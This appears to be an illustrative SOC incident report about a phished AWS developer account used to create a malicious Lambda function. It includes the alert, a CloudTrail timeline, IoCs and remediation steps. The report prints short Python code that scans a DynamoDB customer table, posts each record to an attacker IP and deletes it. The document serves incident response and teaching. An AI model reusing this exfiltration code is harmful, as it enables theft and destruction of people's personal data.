AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-SERVERLESS-1648-7842 Alert Time: 2024-03-14 14:15:33 EST Severity: HIGH (85/100) Source: AWS GuardDuty + CloudTrail Rule: “Unauthorized Lambda Function Creation and Invocation” MITRE ATT&CK: T1648 – Serverless Execution
Alert Details:
Detection: Unauthorized creation and invocation of AWS Lambda function
AWS Account: 123456789012 (Development) IAM User: dev_user (compromised developer account) Source IP: 185.143.221[.]89 (Bulgaria) Time: 14:00-14:15 EST
API Calls (CloudTrail):
14:00:15 – iam:CreateRole – created role “lambda-exec-role”
14:01:22 – iam:AttachRolePolicy – attached Lambda execution policy
14:02:45 – lambda:CreateFunction – created function “internal-backup-processor”
14:03:30 – lambda:UpdateFunctionCode – uploaded code (ZIP) from S3 (malicious)
14:04:15 – lambda:CreateEventSourceMapping – mapped to DynamoDB table “customer-data”
14:05:22 – lambda:InvokeFunction – invoked function (test)
14:06:00-14:15:00 – 847 invocations of the function (processing data)
Function Code Analysis (from Lambda logs):
Function reads from DynamoDB table “customer-data”
Exfiltrates data to external IP 185.143.221[.]89:443
Deletes records after exfiltration
Detection Logic:
Developer account dev_user does not normally create Lambda functions
Source IP anomalous (Bulgaria)
Function accesses sensitive DynamoDB table
Data exfiltration detected via VPC Flow Logs
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
GuardDuty Console, CloudTrail
Confirmed unauthorized Lambda creation and invocation
2. Function Analysis
Examine Lambda code
AWS Lambda Console
Function exfiltrates DynamoDB data
3. Immediate Action
Delete Lambda function
AWS Lambda
Function deleted
4. Role Cleanup
Delete IAM role and detach policies
AWS IAM
Role “lambda-exec-role” deleted
5. Account Remediation
Disable dev_user account
AWS IAM
Keys rotated; user disabled
6. Data Assessment
Determine exfiltrated data
DynamoDB logs, CloudWatch
8,000 customer records exfiltrated
Jira Incident Report
Ticket: SOC-2024-217 Summary: T1648 – Serverless Execution: Malicious Lambda Exfiltrates Customer Data Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1648, serverless-execution, lambda, guardduty, data-breach Components: Cloud-Security, Serverless-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty + CloudTrail.
Alert: “Unauthorized Lambda Function Creation and Invocation”.
IAM User: dev_user (compromised developer account).
Function: internal-backup-processor (malicious).
Data: 8,000 customer records exfiltrated.
Time: 2024-03-14 14:15 EST.
Technique: MITRE ATT&CK T1648 – Serverless Execution.
2. Technical Analysis:
Attack Chain:
13:30 – dev_user credentials compromised (phishing)
13:45 – Attacker logs into AWS from Bulgaria
14:00-14:05 – Creates IAM role and Lambda function
14:05-14:15 – Invokes function 847 times, exfiltrating data
14:15 – GuardDuty detects
Lambda Function Analysis:
Name: internal-backup-processor
Runtime: Python 3.9
Code:
import boto3, requests
def handler(event, context):
dynamo = boto3.client(‘dynamodb’)
data = dynamo.scan(TableName=’customer-data’)
for item in data[‘Items’]:
requests.post(‘https://185.143.221[.]89/exfil’, json=item)
dynamo.delete_item(Key=item[‘id’])
Purpose: Exfiltrate and delete customer records
Data Exfiltrated:
8,000 customer records (name, address, email, phone, SSN)
Total size: ~40 MB
Impact:
Customer data stolen
DynamoDB table partially deleted
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Function creation and invocation
14:15 – Alert
14:17 – SOC investigates
14:18 – Function deleted
14:19 – Role deleted
14:20 – Account disabled
Indicators of Compromise (IoCs):
AWS:
– Lambda function: internal-backup-processor
– IAM role: lambda-exec-role
– Exfiltration IP: 185.143.221[.]89
Data:
– 8,000 customer records exfiltrated
4. Containment Actions:
Immediate Actions:
Deleted malicious Lambda function.
Deleted IAM role.
Rotated dev_user keys.
Disabled compromised account.
Blocked exfiltration IP.
Data Protection:
Determined scope of data loss (8,000 records).
Notified legal, PR, management.
Began customer notification process.
Restored deleted records from backup (DynamoDB point-in-time recovery).
Cloud Remediation:
Implemented AWS Config rules to monitor Lambda creation.
Enabled VPC Flow Logs for Lambda functions.
Enhanced IAM policies.
5. Root Cause Analysis:
Primary Cause: Developer account compromised.
Contributing Factors:
No MFA on account.
Excessive permissions allowed Lambda creation.
No monitoring for new Lambda functions.
6. Business Impact:
Operational Impact: None.
Data Exposure: 8,000 customer records stolen.
Regulatory Impact: GDPR/CCPA breach.
Reputational Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Function deleted.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for Lambda changes.
8. Conclusion:
An attacker compromised a developer account and created a malicious Lambda function that exfiltrated 8,000 customer records from DynamoDB. GuardDuty detected the anomalous activity, enabling deletion of the function. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; function deleted; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 15:30 EST